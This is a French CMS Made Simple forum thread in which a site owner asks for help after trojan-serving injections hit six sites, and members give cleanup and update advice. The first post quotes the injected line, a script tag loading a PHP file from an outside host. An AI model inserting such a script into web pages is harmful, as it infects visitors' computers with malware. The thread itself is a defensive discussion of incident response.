Forum CMS Made Simple FR
Piratage de mes CMSMS - Version imprimable

+- Forum CMS Made Simple FR (https://forum.cmsmadesimple.fr)
+-- Forum : Général (https://forum.cmsmadesimple.fr/forum-3.html)
+--- Forum : Général (https://forum.cmsmadesimple.fr/forum-10.html)
+--- Sujet : Piratage de mes CMSMS (/thread-491.html)



Piratage de mes CMSMS - yateri - 25/06/2010

Citation :#~~~~~ NE PAS SUPPRIMER CE BLOC ~~~~~
#~ Version du CMS: 1.7.1
#~ Nom de l'hébergeur : Phpnet
#~ Informations Système :
#~ Impossible d'y accéder, site inaccessible.
#~~~~~ NE PAS SUPPRIMER CE BLOC ~~~~~
Bonjour,

il y a quelques jours j'ai commencé à recevoir des messages de mon hébergeur me disant que des tentatives de pishing partaient de mes sites, puis Google m'a blacklisté et aujourd'hui je me retrouve avec 6 CMSMS H.S.

Le problème est quand on visite une page, il y a un script placé entre le HEAD et le BODY qui télécharge un Trojan sur le pc :

Code :
</head>
<script src=http://makservicelaw. com/images/gifimg.php ></script>
<body>
J'ai besoin de votre aide car je ne trouve pas à quel niveau mes CMSMS ont pu être infectés, d'abord où se trouve la faille, mais également à quel moment ce code est inséré dans la page, car je ne trouve rien dans l'index.php, ou dans la BDD.

Le site était en version 1.4 je crois, je l'ai réinstallé en 1.7.1, et rebellote, j'ai encore ce problème de script qui s'insère dans la page qui revient tout seul. J'en conclue qu'il doit être stocké dans la BDD mais où...?

Merci beaucoup pour votre aide !


Piratage de mes CMSMS - bess - 25/06/2010

la source du soucis :

Citation :Le site était en version 1.4
comme on le crie tout le temps : conservez vos installations à jour. Enfin maintenant que c'est fait...

Ton cas est grave car post-piratage rien ne t'assure que des fichiers n'ont pas été altéré sur tes installations.

Je n'ai pas la prétention d'avoir la meilleur solution mais voila ce que je te conseille de faire :
-> sauvegarde générale : BDD + fichier à récupérer sur ton PC
-> RAZ totale de tes FTP + BDD en ligne
-> changement de mot passe de la BDD et du FTP (voir avec ton hébergeur)
-> ajout d'une page index.html sur chaque domaine avec une simple phrase : "en travaux, de retour d'ici peu"
-> réinstallation site par site de la dernière version de cmsms 1.7.1

A partir de là c'est un poil complexe : sur ton PC tu installe WAMP et fait tourner tes sites piratés sans en consulter la partie public. En fait tu te connecte sur la partie admin.

Et tu copie doucement le contenu des pages de CMS, le gabarit, les feuilles de style, les contenus globaux et les balises utilisateurs, les news si nécessaire vers le site installé en ligne

FAIS ATTENTION A PAS COPIER AU PASSAGE UNE LIGNE DOUTEUSE

une fois tout le contenu copié tu passes aux fichiers contenu dans /upload toujours en prenant soin de vérifier l'intégrité du fichier.

Une fois un site terminé, tu retire le fichier index.html du site et tu vérifie que le soucis n'existe plus.

Sincèrement : bon courage


Piratage de mes CMSMS - yateri - 25/06/2010

bess a écrit :la source du soucis :
Citation :Le site était en version 1.4
comme on le crie tout le temps : conservez vos installations à jour. Enfin maintenant que c'est fait...
Oui mais comme beaucoup répondent aussi, maintenir un site constamment à jour est fastidieux, encore plus quand il y a des tas de modules qui risquent de ne pas être compatibles entre eux. Du coup on laisse passer quelques versions avant de s'attaquer à une mise à jour. Et très franchement, ça ne garantira jamais à 100% qu'on ne se fera jamais piraté. D'autant plus que je pense que la faille se trouve dans un module de vente programmé par Calguys à qui j'ai personnellement parlé il y a quelques mois, et qu'il ne maintient pas à jour ce genre de module qu'il programme pour facturer par la suite des personnalisations.

bess a écrit :Ton cas est grave car post-piratage rien ne t'assure que des fichiers n'ont pas été altéré sur tes installations.

Je n'ai pas la prétention d'avoir la meilleur solution mais voila ce que je te conseille de faire :
-> sauvegarde générale : BDD + fichier à récupérer sur ton PC
-> RAZ totale de tes FTP + BDD en ligne
-> changement de mot passe de la BDD et du FTP (voir avec ton hébergeur)
-> ajout d'une page index.html sur chaque domaine avec une simple phrase : "en travaux, de retour d'ici peu"
-> réinstallation site par site de la dernière version de cmsms 1.7.1
- Fait (dump tous les jours)
- Fait
- Fait, je les change tous les jours depuis lundi
- Fait
- Fait, c'est à ce moment là que je me suis aperçu que la nouvelle installation été à nouveau vérolée.

bess a écrit :A partir de là c'est un poil complexe : sur ton PC tu installe WAMP et fait tourner tes sites piratés sans en consulter la partie public. En fait tu te connecte sur la partie admin.

Et tu copie doucement le contenu des pages de CMS, le gabarit, les feuilles de style, les contenus globaux et les balises utilisateurs, les news si nécessaire vers le site installé en ligne

FAIS ATTENTION A PAS COPIER AU PASSAGE UNE LIGNE DOUTEUSE

une fois tout le contenu copié tu passes aux fichiers contenu dans /upload toujours en prenant soin de vérifier l'intégrité du fichier.

Une fois un site terminé, tu retire le fichier index.html du site et tu vérifie que le soucis n'existe plus.
Outch.

Sérieux si je dois reprendre toutes les pages, les news, templates, feuilles de styles, les configurations, les modules (rien que FormBuilder y'en a pour des heures), je préfère laisser tomber et aller élever des Pingouins en Afrique du Sud.

Je voyais ça plus simplement : trouver à quel moment ce foutu bout de code est inséré dans mes pages et l'exterminer...

bess a écrit :Sincèrement : bon courage
Merci Undecided


Piratage de mes CMSMS - bess - 25/06/2010

Citation :Oui mais comme beaucoup répondent aussi, [...]
mauvaise excuse, j'ai une dizaine de site continuellement mis à jour. C'est certain c'est chiant, mais soit on réduit les risques de piratage à un petit 0.01% soit on croise les doigts et on espère passer au travers...

En l'occurrence une version 1.4 datant de Aout 2008... c'est très (trop?) osé de ta part. Je doute que tu restes autant de temps sans antivirus sur ton PC

Citation :il ne maintient pas à jour ce genre de module qu'il programme pour facturer par la suite des personnalisations.
hé faut bien qu'il vive aussi Wink

enfin je n'entrerais pas dans le débat du "est ce que le tout gratuit peut exister ?", c'est pas le sujet

je ne sais pas si il y a une faille dans un de ses modules ou même dans un module particulier. Pour moi l'origine est logiquement dans ta version 1.4

que tu ai installé une 1.7.1 par dessus ne sert plus a rien si le hacker à déposé des fichiers corrompus qui lui permettent maintenant d'aller et venir sur tes installs.

la seule solution pour moi : raz total

autre solution : réinstallation d'un backUp que tu dois logiquement faire régulièrement... mais si tu l'avais fait je suppose que tu en aurais parlé.

Citation :Je voyais ça plus simplement : trouver à quel moment ce foutu bout de code est inséré dans mes pages et l'exterminer...
tu rêves ...., un pirate est suffisamment intelligent pour laisser tout en double : la frame qui est repérable et donc potentiellement peut être retirée par tes soins + une backdoor silencieuse qui lui permettra sitôt que t'auras corrigé la merde, de revenir la remettre.

RAZ !


Piratage de mes CMSMS - yateri - 25/06/2010

Au temps pour moi, je viens de voir les backups, c'était la 1.6 pas la 1.4

Je fais un dump de la BDD tous les jours, et de temps en temps je backup le dossier uploads, pas plus.

Je vais encore chercher un peu, si je dois tout réinstaller c'est pas une heure ou deux de recherches qui vont me plomber mon temps d'indisponibilité Sad


Piratage de mes CMSMS - bess - 25/06/2010

Citation :c'était la 1.6
piratable également... et malheureusement

une simple mise à jour vers une 1.6.7 t'aurais épargné les emmerdes

bon courage pour tes recherches


Piratage de mes CMSMS - Michel - 25/06/2010

Salut !
Solution : faire payer un forfait de mise à jour du cmsms à tes clients. Le client qui ne veut pas payer tant pis pour lui, il risque le piratage... responsabilité que tu auras décliné dans tes conditions générales de vente bien sûr !
Donc soit il paye une mise à jour à 80 € euros (exemple !), soit il paie un nettoyage + réinstall complète à 250 € (re-exemple !).
La maintenance de site est une autre facette du métier Wink


Piratage de mes CMSMS - yateri - 25/06/2010

Salut !

je suis certes informaticien, j'ai certes fait payé un site de vente en ligne à une amie, mais le reste c'est des sites que je fais pour mon plaisir et généralement pour des associations dont je suis membre.

J'ai un peu regardé du côté de l'infiltration, c'est un trojan connu qui installe une passerelle PHP pour les pirates, où ils peuvent faire passer n'importe quoi par requêtes POST. Malheureusement dur de s'en débarrasser, une vraie vermine, on a beau tout nettoyer si on oublie un seul fichier ça réinfecte tout.

D'ailleurs sur mon hébergement mutualisé, j'ai plusieurs dossiers avec plusieurs sites, si l'un d'eux est touché tous les autres sont touchés, donc il serait inutile de faire payer une mise à jour à l'un et pas à l'autre.

Quelle galère...


Piratage de mes CMSMS - bess - 25/06/2010

Citation :on a beau tout nettoyer si on oublie un seul fichier ça réinfecte tout.
exactement ce que je t'avais dit...

t'as pas vraiment le choix tu sais...


Piratage de mes CMSMS - yateri - 25/06/2010

Pour l'instant je me concentre sur la source du problème. Il n'est pas impossible que les pirates soient passés par un autre chemin qu'un script défaillant. Je viens de recevoir mes Logs Ftp de mon hébergeur, j'ai des tentatives de connexions qui ont échoué depuis que j'ai changé mes pass de plusieurs IP situées aux US et ailleurs. En remontant plus loin je trouve des connexions réussies et des fichiers uploadés...

Or s'ils ont mon pass Ftp, ils n'ont pu l'avoir qu'en passant par un trojan déjà installé sur mon poste, ou par un FileZilla vérolé, il n'est pas stocké sur le serveur. Je vois de nouveau Linux qui me fait les yeux doux...